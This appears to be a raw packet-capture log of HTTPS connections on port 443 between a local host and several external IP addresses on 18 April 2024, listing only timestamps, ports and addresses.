Apr 18, 2024 23:27:10.281707048 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.282536983 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.282619953 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.283468008 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.283518076 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.283565044 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.283608913 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.284399033 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.284449100 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.285322905 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.285373926 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.285432100 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.285481930 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.286231041 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.286282063 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.286318064 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.286382914 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.287261009 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.287317038 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.288090944 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.288145065 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.288254976 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.288302898 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.288995028 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.289048910 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.289911985 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.289971113 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.290010929 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.290060043 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.290827990 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.290875912 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.291712999 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.291757107 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.293575048 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.293592930 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.293628931 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.293631077 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.293679953 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.293694019 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.293732882 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.293744087 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.293792009 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.296395063 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.296452999 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.296468973 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.296478987 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.296510935 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.296681881 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.296736956 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.297404051 CEST	49734	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:10.297416925 CEST	443	49734	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:10.421252966 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.421295881 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.421422958 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.421571016 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.421580076 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.454329014 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.454343081 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.454385996 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.454463005 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.454504967 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.454600096 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.454781055 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.454858065 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.454902887 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.454922915 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.454947948 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.455054045 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.455096960 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.455199957 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.455235004 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.456640959 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.456718922 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.456789017 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.457304001 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.457334995 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.457798004 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.457818985 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.457875967 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.457988977 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.458050013 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.458105087 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.458229065 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.458256006 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.458719969 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.458753109 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.751527071 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.755280972 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.755300999 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.756855011 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.757123947 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.758002996 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.758002996 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.758019924 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.758090019 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.785723925 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.786040068 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.786113977 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.786170959 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.786403894 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.786420107 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.786892891 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.787060022 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.787081957 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.787834883 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.787909985 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.788039923 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.788130999 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.788702965 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.788739920 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.788800001 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.788811922 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.788875103 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.788902044 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.789015055 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.789098978 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.789411068 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.789601088 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.789685011 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.789740086 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.789747000 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.790319920 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.790632963 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.790690899 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.790937901 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.791201115 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.791222095 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.792228937 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.792296886 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.792553902 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.792680025 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.792733908 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.792773008 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.792793036 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.793200016 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.793312073 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.793875933 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.793982029 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.794065952 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.794096947 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.794424057 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.794610977 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.795192003 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.795295000 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.795407057 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.795435905 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.832118034 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.836189985 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.836193085 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.850368977 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.850419044 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.850472927 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:10.904366016 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:10.919909954 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.919910908 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.919939995 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.919956923 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.920001984 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.920001984 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.920037985 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.920097113 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.948868990 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.948898077 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.948916912 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.948957920 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.948976040 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.949002981 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.949043036 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.949055910 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.949070930 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.949104071 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.949147940 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.949172020 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.949232101 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.949232101 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.949242115 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.949314117 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.949389935 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.955054045 CEST	49740	443	192.168.2.4	192.229.173.207
Apr 18, 2024 23:27:10.955066919 CEST	443	49740	192.229.173.207	192.168.2.4
Apr 18, 2024 23:27:10.987658978 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.987842083 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.988068104 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.989177942 CEST	49741	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.989186049 CEST	443	49741	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.990480900 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.990540981 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.990652084 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.990711927 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.991295099 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:10.991532087 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.991616011 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.991667986 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.991731882 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.991789103 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.991822958 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.991879940 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.991956949 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992150068 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992173910 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992192030 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992218018 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.992223024 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992249966 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992265940 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.992296934 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.992312908 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992389917 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:10.992440939 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:10.995138884 CEST	49745	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:10.995165110 CEST	443	49745	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:10.995534897 CEST	49743	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:10.995577097 CEST	443	49743	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.006458998 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.006458998 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.006520987 CEST	443	49747	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.006611109 CEST	49747	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.007205963 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.007296085 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.035928011 CEST	49742	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.035985947 CEST	443	49742	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.148614883 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.148649931 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.148689985 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.148695946 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.148834944 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.148845911 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.148886919 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.148917913 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.149060011 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.149070978 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.149115086 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.149211884 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.149255037 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.149343014 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.149358988 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.150960922 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.151016951 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.151106119 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.151284933 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.151304007 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.154433012 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.154472113 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.154655933 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.154721022 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.154732943 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.315593958 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:11.315681934 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:11.316348076 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:11.318578005 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 18, 2024 23:27:11.318613052 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 18, 2024 23:27:11.439471006 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.439553976 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.439637899 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.439861059 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.439881086 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.465750933 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.466490030 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.466548920 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.467463017 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.467557907 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.467891932 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.467972040 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.468039036 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.468055964 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.477490902 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.477788925 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.477797985 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.479412079 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.479475021 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.479743958 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.479823112 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.479831934 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.480149984 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.480319023 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.480348110 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.481497049 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.481827974 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.481827974 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.481908083 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.482392073 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.482409000 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.482520103 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.482547045 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.482749939 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.482836008 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.482839108 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.485608101 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.485678911 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.485907078 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.485992908 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.485995054 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.486212969 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.486284018 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.486490965 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.486561060 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.486577034 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.518788099 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.524108887 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.528183937 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.529710054 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.529711962 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.529712915 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.529719114 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.529717922 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.529719114 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.529722929 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.529736042 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.575577974 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.575583935 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.575614929 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.576922894 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.674261093 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.674283028 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.674444914 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.674510002 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.674676895 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.685991049 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.686053038 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.686203957 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.686389923 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.686434031 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.687942028 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.688086987 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.688097000 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.688147068 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.688157082 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.688168049 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.688199043 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.688206911 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.688230038 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.688276052 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.688352108 CEST	49753	443	192.168.2.4	152.199.4.44
